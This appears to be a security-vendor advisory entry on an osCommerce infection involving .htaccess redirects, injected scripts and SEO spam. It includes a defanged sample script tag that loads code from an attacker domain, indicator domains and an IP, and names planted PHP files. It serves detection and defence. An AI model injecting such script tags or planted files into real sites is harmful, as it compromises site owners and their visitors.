Description:
OsCommerce infection that usually involves .htaccess redirects, injections of malicious scripts and black hat SEO spam. More details can be found in our blog post about this infection: osCommerce attacks – kirm-sky.ru
Sample of an injected script:
< script src = "http://nt02[.]co.in/3" >
URLs and domains involved in this attack
hxxp://khcol[.]com/page/?ref=aHR0cDovL2FtZXJpY2F....bWluLw== nt02[.]co.in nt002[.]cn nt02[.]co.in nt04[.]in nt06[.]in nt07[.]in webarh[.]com/r.php 77.78 .245.63/index.php kirm-sky[.]ru
Most of the sites affected also had a few PHP files inserted inside the /images folder, generally called inclasses.php or phpclasses.php.
Affecting: osCommerce websites